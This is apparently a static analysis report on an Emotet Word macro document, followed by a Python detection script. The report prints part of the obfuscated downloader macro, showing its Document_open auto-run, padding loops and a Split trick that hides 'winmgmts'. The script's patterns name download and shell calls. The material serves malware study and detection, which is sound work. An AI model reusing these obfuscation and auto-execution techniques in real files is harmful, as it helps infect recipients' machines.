Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 1ba4567587c2ad39…

MALICIOUS

Office (OLE)

Size: 182.0 KB
Created: 2019-12-20 17:07:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25

MD5: d927d1a5ce4b16ae230abba7d5d3bdbe
SHA-1: 90702bcbc28ab5a56c0d22f4b6bb72ea827b852b
SHA-256: 1ba4567587c2ad39fb46ddb71c97589cbb83d9ef66715933f7a6d9ca6f553009
202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the file with the signature 'Doc.Downloader.Emotet-7473497-0', a strong indicator for the Emotet family, and the static heuristics are consistent with that verdict. The document carries a 'Document_open' handler, so the macro runs as soon as the document is opened with macros enabled, and a 'GetObject' call is present, the usual way these maldocs obtain a COM or WMI object through which a second-stage command is launched. The extracted source shows the padding that is characteristic of Emotet maldocs of this period: loops of the form 'Do While X = 1' over variables that are never assigned (an unassigned Variant is Empty, so the comparison is False and the loop body never executes), filler string literals, meaningful values hidden in UserForm control properties ('Aojplemq.Gzuokbkyuug', a TextBox declared on the document module, and the '.Tag' of controls on the 'Jeuwzqvsdrcqz' form), and a 'Split' call over a string built around a junk separator ('__&888*&^bBGks^@', also stored in a variable just above it). The visible fragments between separators, 'wi', 'nmg' and 'mts', read 'winmgmts', the WMI service moniker. The 7618-byte extracted module is cut off in the preview before the final command is assembled, so the downloader behaviour is inferred from this structure and the heuristic firings rather than from a recovered payload URL.

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-7473497-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro: runs automatically when the document is opened with macros enabled, with no further user interaction
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call: obtains a reference to an existing COM or WMI object by moniker, a common way for maldocs to reach WMI or shell functionality without a CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the standard DrawingML XML namespace URI that any Office document with drawing content references; it is not a network indicator and should not be treated as a download or C2 address.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7618 bytes
SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Hcmhzkjwdl = 3 * Fqdsyasenoww
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
      For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
         Bnbajuowvggcm = ("Rerum ad nihil vel.")
         Gingzqsy = 223
      Next
      Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
   Ewdbqeofwfve = 234 + 423
   Do While Ucwjhgwmvyh = 1
      Rdkgxjky = 3 * Hscfaewhrzd
      Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
      For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
         Wrljfjwzrb = ("Velit saepe.")
         Ndffipzh = 223
      Next
      Ulszawfr = Chtalegcvuz
Loop
End Sub

Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
   Ecpsjpwmt = 234 + 423
   Do While Iflpcowzdtqob = 1
      Qlrgusoolmu = 3 * Evuphzdzzkfb
      Mnnnndwy = ("Et.")
      For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
         Jiygysjieomg = ("Enim ut vel.")
         Hhkijhrspcfz = 223
      Next
      Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
   Xoxcfslhh = 234 + 423
   Do While Pkocrnurft = 1
      Kkoupcjxomswo = 3 * Llcoewtryqjb
      Bqljpnrrywfxb = ("Autem.")
      For Sroysigd = Cqtqegapan To Nyfcungih
         Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
         Upfiaghl = 223
      Next
      Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
   Zcyuqbzhudyk = 234 + 423
   Do While Wvxzhtphlfoe = 1
      Ibunrqdbman = 3 * Aoxboyme
      Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
      For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
         Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
         Jkgqadlqc = 223
      Next
      Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
   Lhsyghafslbi = 234 + 423
   Do While Letzvixom = 1
      Xdgyuyaelpj = 3 * Hgrkaaarl
      Gdjeewwuxkid = ("Ea et.")
      For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
         Uphpromjiicnw = ("Magnam.")
         Pgxecxxnq = 223
      Next
      Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
   Yyqtlblmjar = 234 + 423
   Do While Usazcqclwva = 1
      Bvovtqeuu = 3 * Dwiiuaeoe
      Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
      For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
         Plpplkfme = ("Dicta.")
         Pcryihkdhla = 223
      Next
      Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
   Hhahpldlmgytv = 234 + 423
   Do While Bdbvsqpntmg = 1
      Cpsroosgidlmw = 3 * Nxrrvfnk
      Iisthuiee = ("Larry")
      For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
         Ujcwmygukzttl = ("Ronnie")
         Puyciwrsobfm = 223
      Next
      Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Dxztlkebm = 234 + 423
   Do While Ngqkvsvdtavag = 1
      Mvopoxnzbmda = 3 * Vpwvlvkkk
      Xiaghwsmsyin = ("Sint hic officiis vel.")
      For Bagoxrskw = Yfumibldur To Ttpkosinbao
         Evmtdnmdvjry = ("Et.")
         Wwjcpnmnvh = 223
      Next
      Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^b
... (truncated)
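The patterns the heuristics and the preview above point to, as an added example that is not part of this report or of any analysis tool: a small Python scanner that flags auto-execution entry points and object-execution calls, lists padding loops whose guard variable is never assigned, and statically reassembles strings hidden behind 'Split' with a junk separator. The embedded macro is a constructed sample in the style of the preview: the separator and the 'wi'/'nmg'/'mts' fragments are the ones visible above, the loop padding copies its shape, and the 'GetObject(Join(...))' line and the variable 'Hxq' are hypothetical, added so the reassembled string has a consumer. Nothing here reproduces the part of the real macro that the preview cuts off.

```python
import re
from typing import Dict, List

# Constructed sample in the style of the macro preview. The separator and the
# "wi"/"nmg"/"mts" fragments are taken from the visible preview; the loop
# padding mirrors its shape; the GetObject(Join(...)) line and the name Hxq are
# hypothetical, added so the reassembled string has a consumer. This is not the
# real continuation of the truncated macro.
SAMPLE_VBA = r'''
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident.")
   Loop
   iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts", iwiwiiwiwjjsj)
   Set Hxq = GetObject(Join(Uqdvmpngkfcs, ""))
End Sub
'''

# Entry points Office runs without user interaction once macros are enabled.
AUTOEXEC = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(Document_Open|AutoOpen|Auto_Open|AutoExec|Workbook_Open|Document_Close|AutoClose)\b',
    re.I | re.M)
# Calls that obtain or run something outside the document (the OLE_VBA_GETOBJ class).
SUSPICIOUS = re.compile(
    r'\b(GetObject|CreateObject|Shell|WScript\.Shell|Environ|URLDownloadToFile|XMLHTTP|ADODB\.Stream)\b',
    re.I)
# Plain "name = <string literal>" assignments, used to resolve variables such as the separator.
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(".*")\s*$', re.M)
# Emotet-style padding: a loop guarded by "variable = 1".
DEAD_LOOP = re.compile(r'\bDo While\s+(\w+)\s*=\s*1\b')
# Split(<string expression>, <separator literal or variable>); the first argument
# is assumed to contain no comma inside its literals, which holds for this style.
SPLIT = re.compile(r'\bSplit\(\s*(.+?)\s*,\s*(\w+|"(?:[^"]|"")*")\s*\)', re.S)
# Tokens of a string expression: a quoted literal or an identifier; + and & are skipped.
STR_TOKEN = re.compile(r'"(?:[^"]|"")*"|\w+')


def eval_str_expr(expr: str, env: Dict[str, str]) -> str:
    """Statically evaluate a VBA concatenation of literals and known variables.
    Unknown identifiers evaluate to "" (an unassigned Variant is Empty in VBA)."""
    out: List[str] = []
    for tok in STR_TOKEN.findall(expr):
        if tok.startswith('"'):
            out.append(tok[1:-1].replace('""', '"'))
        else:
            out.append(env.get(tok, ''))
    return ''.join(out)


def build_env(src: str) -> Dict[str, str]:
    """Collect simple string assignments so later expressions can resolve them."""
    env: Dict[str, str] = {}
    for name, lit in ASSIGN.findall(src):
        env[name] = eval_str_expr(lit, env)
    return env


def dead_loops(src: str) -> List[str]:
    """Loop guards that compare a never-assigned variable to 1: Empty = 1 is False,
    so the body never runs and its string literals are pure padding."""
    assigned = set(re.findall(r'^\s*(?:Set\s+)?(\w+)\s*=', src, re.M))
    return [v for v in DEAD_LOOP.findall(src) if v not in assigned]


def reconstruct_splits(src: str, env: Dict[str, str]) -> List[str]:
    """Reassemble strings hidden behind Split() with a junk separator.
    Split("<sep>wi<sep>nmg<sep>mts", sep) yields ["", "wi", "nmg", "mts"]; joining
    the pieces gives back the string the macro was hiding."""
    found: List[str] = []
    for m in SPLIT.finditer(src):
        joined = eval_str_expr(m.group(1), env)
        sep = eval_str_expr(m.group(2), env)
        pieces = joined.split(sep) if sep else [joined]
        found.append(''.join(pieces))
    return found


def analyze(src: str) -> dict:
    """Run all checks over one decoded VBA module and return the findings."""
    env = build_env(src)
    return {
        'autoexec': AUTOEXEC.findall(src),
        'suspicious': sorted({m.group(1) for m in SUSPICIOUS.finditer(src)}),
        'dead_loops': dead_loops(src),
        'reconstructed': reconstruct_splits(src, env),
    }


if __name__ == '__main__':
    for key, value in analyze(SAMPLE_VBA).items():
        print(f'{key}: {value}')
```

On the constructed sample the scanner reports the 'Document_open' entry point, the 'GetObject' call, the never-executing loop guarded by 'Cikubwvivihv', and the reassembled string 'winmgmts'. Run it on the real 'macros.bas' carved above to see how many of its loops are padding and which strings survive the 'Split' trick; values that live in UserForm control properties ('.Tag', TextBox text) are not in the VBA source and have to be pulled from the form's stream separately.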